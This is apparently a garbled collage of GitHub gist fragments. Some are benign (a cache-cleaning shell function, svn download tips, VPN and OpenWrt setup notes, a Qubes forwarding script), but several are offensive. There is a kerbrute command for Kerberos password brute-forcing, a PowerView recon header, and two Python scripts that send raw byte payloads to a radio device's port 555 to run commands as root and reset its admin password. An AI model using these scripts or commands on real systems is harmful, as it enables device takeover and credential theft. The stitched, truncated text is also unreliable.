With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
import socket | |
from time import sleep | |
address = '192.168.1.11' # the target | |
port = 555 | |
# set up binary strings to send to the radio | |
root = bytearray(b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xad\x00\x00\x00\x00\x72\x6f\x6f\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') | |
moinfo = bytearray(b'\x6d\x6f\x2d\x69\x6e\x66\x6f\x20\x73\x79\x73\x74\x65\x6d\x20\x3b\x20\x6e\x74\x70\x20\x3b\x20\x69\x70\x20\x3b\x20\x69\x70\x76\x36\x20\x3b\x20\x65\x74\x68\x20\x3b\x20\x61\x61\x61\x2d\x73\x65\x72\x76\x65\x72\x20\x3b\x20\x61\x61\x61\x20\x3b\x20\x73\x6e\x6d\x70\x2d\x6d\x6e\x6 |
import socket | |
from time import sleep | |
#this sets the password to 'Abc123123' | |
target = '1.2.3.4' | |
admin = bytearray(b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x39\x00\x00\x00\x00\x61\x64\x6d\x69\x6e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') | |
setpassword = bytearray(b'\x73\x69\x6d\x70\x6c\x65\x2d\x63\x6f\x6d\x6d\x61\x6e\x64\x20\x73\x65\x74\x20\x75\x73\x65\x72\x20\x61\x64\x6d\x69\x6e\x20\x74\x79\x70\x65\x20\x61\x64\x6d\x69\x6e\x20\x70\x61\x73\x73\x77\x20\x41\x62\x63\x31\x32\x33\x31\x32\x33\x00') #Abc123123 |
# pyclean command to clear all python cache in a directory | |
# source: https://stackoverflow.com/questions/28991015/python3-project-remove-pycache-folders-and-pyc-files | |
# in .bash_profile / .bash_rc etc put: | |
pyclean () { | |
find . -type f -name '*.py[co]' -delete -o -type d -name __pycache__ -delete | |
} | |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
For other users who just want to download a file/folder from github, simply use: | |
svn export <repo>/trunk/<folder> | |
e.g. | |
svn export https://github.com/lodash/lodash.com/trunk/docs | |
(yes, that's svn here. apparently in 2016 you still need svn to simply download some github files) | |
Courtesy: Download a single folder or directory from a GitHub repo |
@ECHO off | |
rem.||( | |
** WINDOWS BATCH SCRIPT TO CONNECT TO RISEUP.NET VPN RED ** | |
https://riseup.net/en/vpn/vpn-red | |
- my win10 x64 system wouldn't grab an IPv4 address upon the initial connection, so I forced this script to release and renew it's IPv4 address once the VPN was activated | |
- also, my system would loose routes every so often, so I have an infinite loop at the end of this script that constantly adds the proper riseup.net VPN routes every 5 minutes. | |
- to determine which ROUTES need to be implemented, watch when openvpn-gui connects and you will see a section like this -- which is where the routes are configured; |
#!/bin/sh | |
# Inspired by https://gist.github.com/daktak/f887352d564b54f9e529404cc0eb60d5 | |
# Inspired by https://gist.github.com/jpouellet/d8cd0eb8589a5b9bf0c53a28fc530369 | |
ip() { qvm-prefs -g -- "$1" ip; } | |
netvm() { qvm-prefs -g -- "$1" netvm; } | |
forward() { | |
local from_domain=$1 | |
local to_domain=$2 |
These instructions should work for Streisand as well for others VPN providers (Streisand is a Software that automatically configures a VPS online server with OpenVPN and other VPN/Proxy Softwares in order to have a private VPN Server)
These instructions are for getting an OpenWrt Based Router working as OpenVPN Client (should work for LEDE, Gargoyle and another distributions). Computers connected to Lan Ports of the OpenWrt Router will navigate through the Internet connection of the OpenVPN Server (in this case the Streisand one previously set up) you need a working Router with OpenWrt based firmware flashed on it (LEDE or eko.one.pl could also work) steps works well on Chaos Calmer 15.05 or 15.05.1.
telnet 192.168.1.1
(OpenWrt Router) and set up a password using passwd
You can skip this if you already have a password and can connect using ssh.
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
# New function naming schema: | |
# Verbs: | |
# Get : retrieve full raw data sets | |
# Find : ‘find’ specific data entries in a data set |